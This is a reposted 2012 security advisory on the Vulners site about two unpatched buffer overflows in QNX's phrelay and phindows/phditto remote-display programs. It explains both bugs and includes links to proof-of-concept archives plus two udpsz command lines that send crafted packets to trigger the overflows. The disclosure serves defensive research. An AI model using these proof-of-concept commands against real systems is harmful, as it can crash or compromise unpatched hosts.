Vulners
Lucene search
QNX phrelay/phindows/phditto - Multiple Vulnerabilities
#######################################################################
Luigi Auriemma
Application: QNX phrelay/phindows/phditto
http://www.qnx.com
http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions: current
Platforms: QNX Neutrino RTOS and Windows
Bugs: A] bpe_decompress stack overflow
B] Photon Session buffer overflow
Exploitation: remote
A] versus client and maybe server
B] versus server
Date: 10 May 2012
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
phrelay and phindows/phditto are based on a private protocol that
allows to use the Photon graphical environment of the server (through
the phrelay inetd program) on another machine (phindows, phditto and
any other client).
#######################################################################
=======
2) Bugs
=======
--------------------------------
A] bpe_decompress stack overflow
--------------------------------
The BPE (byte pair encoding) compression uses two stack buffers of 256
bytes called "left" and "right".
The bpe_decompress function used in all the client/server programs of
this protocol is affected by a stack based buffer-overflow caused by
the lack of checks on the data sequentially stored in these two
buffers.
---------------------------------
B] Photon Session buffer overflow
---------------------------------
Buffer-overflow affecting phrelay in the handling of the device file
specified by the client as existing Photon session.
Note: considering that phrelay is not enabled by default and allows to
connect without authentication directly to /dev/photon (the screen
visible phisically on the machine) and phindows/phditto must be
manually pointed to the malicious host for exploiting bug A, this
advisory must be considered only a case study and nothing more.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
A]
at the moment I don't know how to call bpe_decompress on phrelay but I
have verified that the bpe_decompress function is vulnerable at 100%.
the following test works only on phindows/phditto (the proof-of-concept
acts as a server):
udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff
B]
udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff
#######################################################################
======
4) Fix
======
No fix.
#######################################################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2012 00:00Current
7High risk
Vulners AI Score7